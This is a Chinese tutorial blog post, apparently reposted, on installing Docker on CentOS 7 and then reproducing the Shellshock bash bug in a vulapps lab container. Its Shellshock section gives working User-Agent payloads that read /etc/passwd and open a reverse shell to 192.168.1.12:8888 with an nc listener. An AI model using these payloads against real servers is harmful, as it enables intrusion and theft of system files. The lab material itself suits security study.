上一篇讲了乌班图的docker安装,这次复现使用centos7,意图很明显啦,就是为了让大家都知道这两种linux。最后一个经典的bash漏洞复现。不说题外话啦,开始正文 1、centos7安装 centos7 自带安装 yum install docker 启动docker Systemctl start docker Systemctl status docker 开启的状态 2、镜像安装 注意:这里需要阿里的更新源,否则docker语句会出现错误 搜索镜像 Docker search centos7 获取镜像 Docker pull docker.io/centos (镜像名字) 3.进入容器与退出容器 docker run -t -i docker.io/centos /bin/bash 其中-t 选项让Docker分配一个伪终端(pseudo-tty)并绑定到容器的标准输入上, -i 则让容器的标准输入保持打开。 使用exit 可以退出容器. 查看有哪些容器 docker images 打包容器 docker save -o centos7.tar docker.io/centos 载入容器 docker load --input centos7.tar 查看进程中的镜像 Docker ps -a 终止镜像 Docker stop 263c082d8fd6 移除镜像 Docker rmi 263c082d8fd6 漏洞1 bash_shellshock 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a command in a modified environment. 我的理解是使用env命令的key=value,首先会改变环境变量key,如果没有会临时创建,注意,这里是临时的改变环境变量。然后就把value后面的内容当做命令执行,类似于PHP中的eval。 利用方法 1、pull docker镜像,搭建环境 docker pull medicean/vulapps:b_bash_shellshock1 2、启动镜像 docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1 3、使用burp抓包,更改UA () { :;};echo ; echo; echo $(/bin/cat /etc/passwd ); 反弹shell () { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/8888 0>&1; Kali运行 nc -l -p 8888 -vvv 某云案例 具体链接就不发了,可自行搜索shellshock,有问题可关注发送留言哦~~~~~ |
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!
本文出自:http://www.toutiao.com/a6466572206691320334/ 免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。 |
新出炉